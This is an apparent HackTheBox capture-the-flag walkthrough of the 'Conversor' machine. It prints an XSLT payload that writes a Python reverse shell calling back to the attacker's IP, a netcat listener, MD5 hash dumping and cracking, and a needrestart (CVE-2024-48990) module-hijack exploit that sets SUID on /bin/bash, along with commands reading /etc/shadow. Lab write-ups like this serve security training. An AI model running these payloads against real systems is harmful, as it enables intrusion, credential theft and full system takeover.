Back to Writeups

HTB Conversor Walkthrough

XXE Injection & Needrestart Privilege Escalation

Published: October 2, 2025 Difficulty: Medium

Conversor is a HackTheBox machine that demonstrates XXE (XML External Entity) injection vulnerabilities combined with XSLT exploitation for initial access, followed by exploiting CVE-2024-48990 in needrestart for privilege escalation. This machine teaches web application security and modern Linux privilege escalation techniques.

Reconnaissance Phase

Network Scanning

Objective: Discover open ports and running services on the target machine.

Perform a service version scan using Nmap:

nmap -sV <TARGET_IP>

The scan reveals the following open ports:

  • Port 22 (SSH): OpenSSH 8.9p1 Ubuntu 3ubuntu0.13
  • Port 80 (HTTP): Apache httpd 2.4.52

Key Learnings:

Limited attack surface with SSH and HTTP services. The web application becomes the primary target for initial access.

Web Application Access

Objective: Access and analyze the web application.

Attempting to access the target IP directly in the browser results in a connection error. This indicates the application requires a specific domain name.

HOSTS File Configuration:

Add the target IP to your hosts file to map it to the domain name:

# On Linux/Mac
sudo nano /etc/hosts

# Add the following line
<TARGET_IP>    conversor.htb

# On Windows
# Edit C:\Windows\System32\drivers\etc\hosts
<TARGET_IP>    conversor.htb

After configuring the hosts file, navigate to http://conversor.htb in your browser.

Key Learnings:

Virtual hosting requires proper domain name configuration. HOSTS file manipulation allows local DNS resolution for penetration testing.

Account Registration

Objective: Create an account to access application features.

Register an account on the web application:

  • Username: anon
  • Password: (your chosen password)

After registration, explore the application's functionality to identify potential vulnerabilities. Look for:

  • File upload features
  • Data conversion or processing functions
  • XML/JSON parsing endpoints
  • API documentation

Key Learnings:

Application functionality often reveals attack vectors. File processing features are particularly interesting for XXE and injection attacks.

XXE & XSLT Exploitation

Understanding the Vulnerability

Objective: Identify and exploit XXE (XML External Entity) vulnerabilities.

The application appears to process XML files, potentially through an XSLT transformation. This creates an opportunity for XXE injection combined with XSLT exploitation.

XXE Attack Overview:

  • XML parsers that process external entities can be exploited
  • XSLT transformations can execute arbitrary code
  • We can write files to the server using XSLT document() function

Key Learnings:

XXE vulnerabilities allow attackers to read files, perform SSRF attacks, and in some cases achieve code execution through XSLT exploitation.

Crafting the Exploit Payload

Objective: Create malicious XML and XSLT files to achieve code execution.

Step 1: Create the XML File (nmap.xml)

<?xml version="1.0" encoding="UTF-8"?>
<nmaprun>
  <host>
    <address addr="127.0.0.1"/>
  </host>
</nmaprun>

Step 2: Create the XSLT Exploit (exploit.xslt)

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
                xmlns:exploit="http://exslt.org/common" 
                extension-element-prefixes="exploit" 
                version="1.0">
  <xsl:template match="/">
    <exploit:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("YOUR_HTB_VPN_IP",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/sh")
    </exploit:document>
  </xsl:template>
</xsl:stylesheet>

Important: Replace YOUR_HTB_VPN_IP with your actual VPN IP address.

Payload Explanation:

  • XSLT document() function writes content to a file
  • Target path: /var/www/conversor.htb/scripts/shell.py
  • Payload: Python reverse shell connecting to our listener

Key Learnings:

XSLT document() function can be abused to write arbitrary files on the server. This combined with web-accessible directories leads to remote code execution.

Establishing Reverse Shell

Objective: Execute the uploaded Python reverse shell to gain initial access.

Step 1: Set Up Listener

nc -lvnp 4444

Step 2: Upload Exploit Files

Upload both nmap.xml and exploit.xslt through the application's file processing feature.

Step 3: Trigger Execution

Navigate to the uploaded shell script (exact method depends on application functionality):

curl http://conversor.htb/scripts/shell.py

Or trigger through the web interface by accessing the scripts directory.

Check your Netcat listener for the incoming shell connection.

Key Learnings:

XSLT exploitation provides a powerful method for achieving remote code execution through seemingly harmless XML processing features.

System and Database Enumeration

Initial System Exploration

Objective: Explore the system and locate sensitive files.

List files in the current directory:

ls

Result shows conversor.htb directory. Navigate into it:

cd conversor.htb
ls

Files discovered:

  • app.py - Main application file
  • app.wsgi - WSGI configuration
  • instance/ - Instance folder (often contains databases)
  • __pycache__/ - Python cache
  • scripts/ - Scripts directory
  • static/ - Static files
  • templates/ - HTML templates
  • uploads/ - Upload directory

Key Learnings:

Flask applications typically store SQLite databases in the instance folder. Always check application structure for sensitive data.

SQLite Database Extraction

Objective: Extract and analyze the SQLite database containing user credentials.

Navigate to the instance directory:

cd instance
ls

Found: users.db

Query the Database:

sqlite3 -header -column users.db "SELECT * FROM users;"

Results:

id  username        password                        
--  --------------  --------------------------------
1   fismathack      5b5c3ac3a1c897c94caad48e6c71fdec
5   test            cc03e747a6afbbcbf8be7668acfebee5
6   wetpoochie      25f7b348f63e2f4d099383ffb184b220
7   s3r4ph          75bb0a1e0ccd2aa1017c99dc44d68ed7
8   root            63a9f0ea7bb98050796b649e85481845
9   ss              3691308f2a4c2f6983f2880d32e29c84
10  htbuser         47b7bfb65fa83ac9a71dcb0f6296bb6e
11  blumoon         e10adc3949ba59abbe56e057f20f883e
12  admin           21232f297a57a5a743894a0e4a801fc3
13  adim            098f6bcd4621d373cade4e832627b4f6
14  admin@rock.com  0cbc6611f5540bd0809a388dc95a615b
15  test@test.com   68a24878cc568766b735c62be5f306ed
16  test12345       c06db68e819be6ec3d26c6038d8e8d1f

Alternative SQLite Commands:

# List all tables
sqlite3 users.db ".tables"

# Show schema
sqlite3 users.db ".schema users"

# Dump entire database
sqlite3 users.db ".dump"

Key Learnings:

SQLite databases often contain plaintext or weakly hashed credentials. MD5 hashes without salt are particularly vulnerable to rainbow table attacks.

Hash Cracking

Objective: Crack the MD5 password hashes to obtain plaintext credentials.

Use CrackStation to crack the MD5 hash:

Target Hash:

fismathack: 5b5c3ac3a1c897c94caad48e6c71fdec

Cracked Password:

Password: Keepmesafeandwarm

Alternative Cracking Methods:

# Using hashcat
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# Using john the ripper
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Online rainbow tables
# - CrackStation.net
# - HashKiller.io
# - OnlineHashCrack.com

Key Learnings:

MD5 is cryptographically broken and should never be used for password hashing. Modern password hashing should use bcrypt, scrypt, or Argon2.

User Access and Flag Retrieval

Objective: Switch to the compromised user account and retrieve the user flag.

Switch to the fismathack user:

su fismathack

Enter password: Keepmesafeandwarm

Navigate to the user's home directory:

cd /home/fismathack
ls -la

Read the user flag:

cat user.txt
🚩 User Flag: 6eb77af62761b30a458c69fb298613fb

Key Learnings:

Lateral movement through compromised credentials is a critical step in system compromise. Always check home directories for sensitive files and flags.

Privilege Escalation to Root

Sudo Privileges Enumeration

Objective: Identify sudo privileges that can be exploited for privilege escalation.

Check sudo permissions:

sudo -l

Output:

Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart

The user can run needrestart with sudo privileges without a password.

Key Learnings:

Always check sudo privileges immediately after gaining user access. NOPASSWD entries provide direct paths to privilege escalation.

CVE-2024-48990: Needrestart Vulnerability

Objective: Exploit the needrestart vulnerability to achieve root access.

Vulnerability Details:

CVE-2024-48990 is a local privilege escalation vulnerability in needrestart. The vulnerability allows attackers to manipulate Python module imports to execute arbitrary code as root.

Reference:

Key Learnings:

Needrestart is a utility that checks which services need restarting after library updates. The vulnerability exists in how it scans and imports Python modules.

Exploitation Process

Objective: Execute the exploit to gain root privileges.

Step 1: Create Malicious Python Module

cd /tmp
mkdir -p attacker/importlib

Step 2: Create Exploit Code

cat > attacker/importlib/__init__.py << 'EOF'
import os
os.system('chmod u+s /bin/bash')
EOF

Exploit Explanation:

  • Creates a malicious Python module in /tmp/attacker/importlib/
  • When needrestart scans for modules, it will import our malicious code
  • The code sets SUID bit on /bin/bash, allowing privilege escalation

Step 3: Trigger the Vulnerability

sudo needrestart -r a

The -r a flag forces needrestart to automatically restart services, triggering the module scan.

Step 4: Escalate to Root

/bin/bash -p

The -p flag preserves the SUID privileges, giving you a root shell.

Verify Root Access:

whoami

Output should be: root

Key Learnings:

Python module hijacking exploits trust in the module import system. SUID binaries provide direct privilege escalation when properly manipulated.

Root Flag Retrieval

Objective: Retrieve the final root flag.

Navigate to root directory and read the flag:

cat /root/root.txt
🚩 Root Flag: a3720670f454e7bb272ada000ce261a3

Post-Exploitation Activities:

# View root directory contents
ls -la /root/

# Check command history
cat /root/.bash_history

# View shadow file
cat /etc/shadow

# Check cron jobs
crontab -l
ls -la /etc/cron*

Key Learnings:

Root access provides complete system control. In real penetration tests, this is where you would establish persistence, document findings, and prepare the final report.

Challenge Summary

Complete Attack Chain

Full Exploitation Path:

  1. Reconnaissance: Discovered HTTP and SSH services
  2. Access Establishment: Configured hosts file and registered account
  3. XXE/XSLT Exploitation: Uploaded malicious XML/XSLT files to write reverse shell
  4. Initial Access: Triggered Python reverse shell for initial foothold
  5. Database Enumeration: Found SQLite database with user credentials
  6. Credential Cracking: Cracked MD5 hashes to obtain plaintext passwords
  7. Lateral Movement: Switched to fismathack user account
  8. Privilege Escalation: Exploited CVE-2024-48990 in needrestart
  9. Root Access: Achieved full system compromise

Flags Captured:

🚩 User Flag: 6eb77af62761b30a458c69fb298613fb
🚩 Root Flag: a3720670f454e7bb272ada000ce261a3

Technical Skills Demonstrated:

  • Network reconnaissance and service enumeration
  • Virtual host configuration and DNS manipulation
  • XXE (XML External Entity) injection
  • XSLT exploitation for code execution
  • Reverse shell deployment and connection
  • SQLite database enumeration and extraction
  • MD5 hash cracking techniques
  • Linux privilege enumeration
  • CVE research and exploitation
  • Python module hijacking
  • SUID binary manipulation

Vulnerabilities Identified:

  • XXE Injection: XML parser processes external entities unsafely
  • XSLT Code Execution: XSLT transformations allow arbitrary file writes
  • Weak Password Hashing: MD5 without salt enables easy cracking
  • Database Exposure: SQLite database accessible to web server user
  • Excessive Sudo Privileges: NOPASSWD sudo access to vulnerable binary
  • CVE-2024-48990: Needrestart local privilege escalation

Defensive Recommendations:

  • XML Processing: Disable external entity processing in XML parsers
  • XSLT Security: Restrict XSLT transformation capabilities
  • Password Hashing: Use bcrypt, scrypt, or Argon2 instead of MD5
  • Database Security: Implement proper file permissions and encryption
  • Sudo Hardening: Minimize sudo access and avoid NOPASSWD entries
  • Patch Management: Keep systems updated to address known CVEs
  • Input Validation: Validate and sanitize all user inputs
  • Least Privilege: Run services with minimal required permissions

Tools and Techniques Used:

  • Nmap: Network scanning and service detection
  • Netcat: Reverse shell listener
  • XXE/XSLT Payloads: Custom XML exploitation
  • SQLite: Database enumeration and extraction
  • CrackStation: MD5 hash cracking
  • Python: Reverse shell and exploit development
  • CVE Exploitation: Needrestart privilege escalation

Real-World Implications:

  • XXE vulnerabilities remain common in web applications processing XML
  • Weak password hashing practices continue to expose user credentials
  • System utilities with sudo privileges can become privilege escalation vectors
  • Timely patching is critical for preventing exploitation of published CVEs
  • Defense in depth prevents single vulnerabilities from leading to full compromise